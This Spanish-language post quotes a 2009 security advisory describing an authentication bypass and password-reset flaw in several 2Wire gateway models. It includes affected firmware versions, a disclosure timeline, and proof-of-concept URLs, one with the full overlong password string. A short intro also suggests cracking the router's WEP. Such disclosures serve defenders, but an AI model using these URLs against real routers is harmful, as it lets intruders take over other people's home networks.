entrar en el router : http://home/
consola : http://home/mdc
este aparato wep es facil de crackear con linux, en solo unos minutos, busca un cd live como
hack 2wire_CD35_AuthBypass_PassReset_esp
2WIRE GATEWAY AUTHENTICATION BYPASS Y PASSWORD RESET (08/04/09)
==============================================================
DESCRIPCION
—————–
Existe una vulnerabilidad de bypass de autenticacion en page=CD35_SETUP_01
que permite poner un nuevo password a pesar de ya tener un password puesto.
Si se introduce un password de mas de 512 caracteres el password se elimina
y la proxima vez que se acceda al modem se pedira que se introduzca un nuevo
password.
VULNERABLE
—————-
2Wire 2071 Gateway
2Wire 1800HW
2Wire 1701HG
Firmware
5.29.51
3.17.5
3.7.1
NO VULNERABLE
——————-
Firmware
5.29.135.5 o superior
DISCLOSURE TIMELINE
————————-
03/27/2009 – 2wire Contactado
respuesta no satisfactoria
07/11/2009 – Envie los detalles completos a 2wire
ninguna respuesta
07/17/2009 – Envie el advisory y video demos a 2wire
subio el ticket a “escalated” pero ninguna respuesta
08/02/2009 – Lo hice publico en Defcon 17
EXPLOIT/POC
—————–
Authentication Bypass – usa esta pagina para poner un nuevo password
http://gateway.2wire.net?xslt?page=CD35_SETUP_01
Video: http://www.hakim.ws/2wire/2wire_CD35_Bypass.ogv
Password Reset – usa la misma pagina pero con un password de > 512 caracteres
http://gateway.2wire.net/xslt?PAGE=CD35_SETUP_01_POST&password1=hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkhkmhkmhkmhkmhkmhkmhkmhkm&password2=hkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkmhkhkmhkmhkmhkmhkmhkmhkmhkm
Video: http://www.hakim.ws/2wire/2wire_CD35_Reset.ogv
GREETS
————
sdc lightos pcp nitr0us 0xf alt3kx darko DeadSector Etal gwolf h4ckult1m4t3
hackerss hd k00l kaz Kbrown mendozaaaa nahual Napa nediam raza-mexicana
roa octalh Setting sla.ckers thornmaker tr3w vandida vi0let xianur0 Yield
Comunidad Underground de Mexico : https://www.underground.org.mx
h k m
http://www.hakim.ws
